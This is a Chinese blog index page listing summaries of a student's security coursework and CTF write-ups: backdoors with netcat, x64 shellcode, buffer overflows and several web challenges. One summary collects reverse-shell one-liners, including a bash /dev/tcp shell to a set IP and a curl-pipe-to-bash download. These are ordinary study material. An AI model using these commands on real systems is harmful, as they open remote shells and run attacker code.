会员
周边
新闻
博问
闪存
众包
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
20175211lyz
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
5
6
7
8
9
···
17
下一页
2020年3月15日
2019-2020-2 网络对抗技术 20175211 Exp2 后门原理与实践
摘要: 实验内容 使用netcat获取主机操作Shell,cron启动 netcat是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。 其中 选项可以指定一个文件在连接后打开 Windows主机获取Kali shell kali在终端输入 ,将shell反弹给wind
阅读全文
posted @ 2020-03-15 00:46 MustaphaMond
阅读(261)
评论(0)
推荐(1)
2020年3月12日
2019-2020-2 网络对抗技术 20175211 Exp1+ 逆向进阶(x64 shellcode制作及利用)
摘要: x64与x86的区别 64位系统中,不再使用 来进行系统调用,取而代之的是 指令 x64的栈不支持push64位的立即数,必须先把常量放到寄存器里再push x64的CPU的地址为64位,但实际上只支持48位的虚拟地址空间供软件使用。虚拟地址的高16位在用户模式下总是被设置为 ,而在内核模式下全置为
阅读全文
posted @ 2020-03-12 02:17 MustaphaMond
阅读(784)
评论(0)
推荐(2)
2020年3月5日
刷题记录:[V&N2020 公开赛]EasySpringMVC
摘要: 题目复现链接: "https://buuoj.cn/challenges" 参考链接: "2020 年 V&N 内部考核赛 WriteUp" "从一道题入门JAVA反序列化漏洞" "V&N公开赛2020 writeup" Java反序列化 "深入了解序列化writeObject、readObject
阅读全文
posted @ 2020-03-05 21:39 MustaphaMond
阅读(809)
评论(0)
推荐(0)
2020年3月4日
2019-2020-2 网络对抗技术 20175211 Exp1 PC平台逆向破解
摘要: 实践内容 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。 注入一个自己制作的shellcode并运行这段shellcode 实践过程 直接修改程序机器指令,改变程序执行流程 知识要求
阅读全文
posted @ 2020-03-04 03:54 MustaphaMond
阅读(301)
评论(0)
推荐(0)
2020年3月2日
刷题记录:[V&N2020 公开赛]TimeTravel
摘要: 题目复现链接: "https://buuoj.cn/challenges" 参考链接: "2020 年 V&N 内部考核赛 WriteUp" "V&N公开赛2020 writeup" httpoxy "https://httpoxy.org/" "HTTPOXY漏洞说明" 利用条件: 代码以cgi模
阅读全文
posted @ 2020-03-02 22:37 MustaphaMond
阅读(696)
评论(0)
推荐(0)
刷题记录:[V&N2020 公开赛]CHECKIN
摘要: 题目复现链接: "https://buuoj.cn/challenges" 参考链接: "2020 年 V&N 内部考核赛 WriteUp" "V&N公开赛2020 writeup" 反弹shell 在用bash反弹失败后就放弃了。。。惭愧。作为弥补,收集一下反弹shell脚本 "反弹shell"
阅读全文
posted @ 2020-03-02 21:18 MustaphaMond
阅读(1127)
评论(0)
推荐(0)
反弹shell
摘要: 收集一点可能用上的反弹shell命令 bash bash -i >& /dev/tcp/ip/port 0>&1 curl bash -i >& /dev/tcp/192.168.20.151/7777 0>&1 curl http://174.1.73.154/shell.txt|bash PS:
阅读全文
posted @ 2020-03-02 20:53 MustaphaMond
阅读(944)
评论(0)
推荐(2)
2020年2月26日
刷题记录:[PASECA2019]honey_shop
摘要: 题目复现链接: "https://buuoj.cn/challenges" 参考链接: "PASECACTF 2019 Honey_shop" `/proc/self/`永远指向当前进程,而本题源码中 将`SECRET_KEY /proc/self/environ`获取,environ文件记录着当前
阅读全文
posted @ 2020-02-26 23:33 MustaphaMond
阅读(758)
评论(0)
推荐(0)
刷题记录:[SUCTF 2018]annonymous
摘要: 题目复现链接: "https://buuoj.cn/challenges" 参考链接: "[hitcon2017] Baby^H master php 2017 复现" 匿名函数函数名 匿名函数其实是有真正的名字,为 (%d格式化为当前进程的第n个匿名函数) Apache prefork模型(默认模
阅读全文
posted @ 2020-02-26 23:07 MustaphaMond
阅读(692)
评论(0)
推荐(0)
刷题记录:[CSAWQual 2016]i_got_id
摘要: 题目复现链接: "https://buuoj.cn/challenges" 参考链接: "xctf web i got id 200" perl 任意文件读取 题目使用如上代码将上传的文件原样输出到网页 param()函数会返回一个列表的文件但是只有第一个文件会被放入到下面的file变量中。而对于下
阅读全文
posted @ 2020-02-26 22:54 MustaphaMond
阅读(776)
评论(0)
推荐(0)
上一页
1
2
3
4
5
6
7
8
9
···
17
下一页
公告